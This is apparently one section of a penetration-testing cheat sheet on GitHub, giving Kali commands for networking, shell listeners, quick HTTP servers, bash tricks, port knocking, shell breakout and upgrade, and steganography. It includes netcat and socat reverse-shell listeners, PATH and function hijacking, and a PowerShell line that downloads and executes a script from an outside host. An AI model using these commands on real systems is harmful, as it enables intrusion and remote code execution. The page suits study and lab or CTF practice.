Skip to content

main-section-010.MD

Latest commit

 

History

History
147 lines (137 loc) · 3.11 KB

main-section-010.MD

File metadata and controls

147 lines (137 loc) · 3.11 KB

Back to Table of Contents

Tips & Tricks

Web Tools

http://rumkin.com/tools/cipher/
https://wappalyzer.com/
https://retdec.com/decompilation/
https://www.ssllabs.com/ssltest/analyze.html
https://searchdns.netcraft.com/
https://hashkiller.co.uk/ntlm-decrypter.aspx
https://www.onlinedisassembler.com/odaweb/
https://hashes.org/public.php
http://www.csgnetwork.com/hexaddsubcalc.html
https://gchq.github.io/CyberChef/
https://www.cleancss.com/html-beautify/
http://jsnice.org/
http://jsbeautifier.org/

Browser Extensions

Firefox
FoxyProxy
HackBar
TamperData

Networking

# Set IP
Kali> ifconfig eth0 xxx.xxx.xxx.xxx/24

# Calculate subnet
Kali> ipcalc xxx.xxx.xxx.xxx/24

# Bring devices up/down
Kali> ifconfig eth0 up
Kali> ifconfig eth0 down

# Get IP from DHCP
Kali> dhclient

# Log traffic for ICMP packets
Kali> tcpdump -i tun0 icmp

# Test from remote box
Kali> ping $ATTACKER -c 3

Listen for Shell

TCP
Kali> nc -vlnp 54321
UDP
Kali> socat file:`tty`,echo=0,raw udp-listen:54321

Start a simple HTTP server

Kali> python -m SimpleHTTPServer 80
Kali> python3 -m http.server
Kali> ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
Kali> php -S 0.0.0.0:80

Workspace

# A temporary file system that clears on reboot
Kali> cd /dev/shm

Bash Foo

Simple for loop
Kali> for i in `seq 10 20`;do this;done
Remove last byte from a file
Kali> truncate -s -1 filename
Hijack full path to a binary for current pts
Kali> function /usr/bin/foo () { /usr/bin/echo "It works"; }
Kali> export -f /usr/bin/foo
Use Env to force scripts to run a different command
Kali> ln -s /usr/bin/nano cat
Kali> export PATH=.:$PATH

SSH

Generate key
Kali> ssh-keygen -t rsa
SSH with Key
Kali> ssh -i key_file user@host

Port Knocking

Kali> for x in port1 port2 port3;do nmap -Pn --host_timeout 201 --max-retries -p $x $TARGET;done
Kali> nc -z $TARGET port1 port2 port3;

Breakout Shell

Kali> awk ‘BEGIN {system(“/bin/bash”)}’
Kali> python -c ‘import pty; pty.spawn(“/bin/bash”)’
Kali> echo os.system(‘/bin/bash’);
Kali> /bin/sh -i

Upgrade Shell

Netcat
# Background current shell: CTRL + Z
Kali> stty raw -echo
Kali> fg
Powershell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"

# Links
https://github.com/trustedsec/unicorn
Resources
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Stego

Kali> exiftool filename.png
Kali> steghide extract -sf filename.png